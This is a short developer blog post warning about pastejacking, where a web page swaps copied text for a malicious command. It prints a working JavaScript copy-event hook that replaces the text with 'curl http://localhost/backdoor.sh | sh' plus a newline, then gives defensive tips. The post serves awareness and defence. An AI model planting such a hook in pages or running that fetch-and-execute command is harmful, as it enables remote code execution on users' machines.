The Dangers of Copy & Paste (Copas)

The Dangers of Copy & Paste (Copas)
ibnu gunawan prayogo

Ibnu Gunawan P

Tue, 04 2022, 8:10:00 pm

Table Of Content

The Dangers of Copy & Paste (Copas)

I'm sure fellow developers have at some point copied a line of command from a website. We assume that the text we're copying is legitimate. Yes, or is it? What if the text we copy is replaced with a command that can harm us or contain malicious code?

All a hacker needs is a single line of command that can insert a backdoor or virus, allowing them to remotely control your device. This attack is simple yet effective. Here's a further explanation and how it works.

Watch the Video - Simulating the risk of copying and executing code directly in a terminal. For instance, when installing a package using npm and you find a command on a web page, without much thought, most of us simply copy and paste that text into the terminal. Codepen Copy&Paste.

PROBLEM: Another issue here is that the hacker presses enter with the code (\n) after a harmful command, causing the copied command to run automatically.

Example Script Used:

<p id="copy">npm install package</p>

<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://localhost/backdoor.sh | sh\n'); e.preventDefault(); });
</script>

How to Avoid It?

  • Ensure that the websites you visit are trustworthy and secure. For instance, when looking for documentation or a package, go directly to the official site.
  • As a precaution, don't paste copied text directly into the terminal. Try pasting it into a notepad or another text editor first.
  • In essence, avoid pasting text directly into the terminal.

# Author's Message

Always be cautious and vigilant, because we never know what kind of mischief we might face in the future.

That's all I have to offer. I hope it's helpful. Thank you! 😁